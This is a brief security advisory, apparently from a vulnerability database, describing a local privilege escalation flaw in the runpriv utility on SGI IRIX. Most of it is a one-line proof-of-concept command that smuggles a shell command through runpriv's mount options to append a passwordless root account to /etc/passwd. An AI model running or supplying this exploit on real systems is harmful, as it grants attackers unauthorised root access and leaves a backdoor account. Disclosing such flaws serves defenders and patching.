SGI IRIX Runpriv Local Privilege Escalation Vulnerability

SGI IRIX Runpriv Local Privilege Escalation Vulnerability

An exploit is not required.

The following proof of concept is available:
/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|
"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"